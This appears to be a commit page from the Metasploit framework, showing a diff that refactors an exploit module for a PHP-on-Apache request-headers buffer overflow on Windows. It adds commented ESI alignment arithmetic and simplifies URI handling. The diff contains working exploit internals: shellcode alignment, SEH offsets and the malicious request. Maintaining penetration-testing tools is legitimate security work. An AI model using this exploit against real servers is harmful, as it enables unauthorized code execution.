Documenting esi alignment plus using target_uri.to_s

graingert · Jun 16, 2012 · a8a4594 · a8a4594
1 parent 1d12107
commit a8a4594
Showing 1 changed file with 6 additions and 9 deletions.
diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -81,7 +81,11 @@ def exploit
 
 		# Make ECX point to the start of the encoded payload
 		align_ecx = "pop esi\n" # "\x5e"
-		align_ecx << "add esi, -#{target['Offset']+8+5-11}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
+		esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
+			8 + # len(nseh + seh)
+			5 - # len(call back)
+			11 # len(align_ecx)
+		align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
 		align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
 		align_ecx << "add ecx, esi" # "\x01\xf1"
 		sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
@@ -98,15 +102,8 @@ def exploit
 
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
-		uri = target_uri.path
-
-		if target_uri.query and not target_uri.query.empty?
-			uri << "?"
-			uri << target_uri.query
-		end
-
 		res = send_request_cgi({
-			'uri'          => uri,
+			'uri'          => target_uri.to_s,
 			'method'       => 'GET',
 			'headers'      =>
 			{